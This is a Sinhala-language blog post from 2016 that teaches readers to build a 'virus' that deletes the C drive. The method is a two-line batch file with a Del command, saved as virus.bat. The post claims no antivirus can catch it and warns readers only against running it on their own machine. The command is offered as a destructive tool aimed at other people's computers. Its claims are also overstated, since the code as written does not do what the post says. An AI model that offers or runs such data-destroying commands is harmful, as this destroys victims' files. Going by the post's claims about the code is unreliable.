slsoftmania.blogspot.com ඔබත් අප සමග එක් වන්න පරිගණක ලෝකයේ දැණුම බෙදා ගන්න....

Tuesday, January 12, 2016

C Drive එක සම්පූර්මයෙන්ම delete කරන්න Virus එකක් හදමු.

මේක හදන්ඩ කිසිම මෘදුකාංගයක් නම් ඔන වෙන් නෑ . ඔන කරන්නේ පරිගණකයේ Notepad එක විතරයි. මේ වයිරස් එකේ තියෙන හොදකමක් වෙන්නේ මේක කිසිම වයිරස් ගාඩ් එකකට අහුවෙන්නැති එකයි.
මුලින්ම දැනගතයුතුයි මෙය programming කරලා batch file ලෙස සේව් කරන්න ඔන. එවිට එම ෆයිල් එක වෛරස් එක ලෙස ක්‍රියා කරනාව . හැබැයි මේක රන් කරන කොම්පියුටර් එකෙහි C Drive එක සම්පූර්මයෙන්ම delete වේ . .
දැන් බලමු මේක හදාන්න .
1. Notepad එක ඔන් කරලා පහළින් තියෙන කොඩ් එක ඒකට කොපි කරගන්න.
@Echo off
Del C:\ *.* |y
2. දැන් මේක virus.bat ලෙස සේව් කරගන්න.
3. දැන්, මේ ෆයිල් එක රන් කළ විට C Drive එකේ සියලුම ෆයිල්ස් delete වෙනු ඇත.
‪#‎Warning‬..:- තමන්ගේ පරිගණකයේ මෙම ෆයිල් එක රන් කිරීමෙන් වළකින්න. එසේ කලහොත් C: ඩ්‍රයිව් එකෙහි සියලුම ෆයිල් මැකීයනු ඇත.

Share:

0 comments:

Post a Comment

The Best Sri Lankan Blog Sl soft Mania

The Best Sri Lankan Blog Sl soft Mania
.

අපේ FaceBook Page එකට මෙතනින් යන්ඩ.

Popular Posts

Powered by Blogger.

Featured Post

ඉන්ධන සහිත බටරි චාජරය

     අපිට තියන ලොකු ප්‍රශ්නයක් තමයි අපගේ ජංගම දුරකතනයේ බැටරි බහින එක. අපිට චාජ් කරගන්ඩ ඕනේ උනත් හැමතැනම විදුලිය නැනේ. එකට විසදුමක් ලෙස ඉ...

Business

Powered By Blogger

Follow Me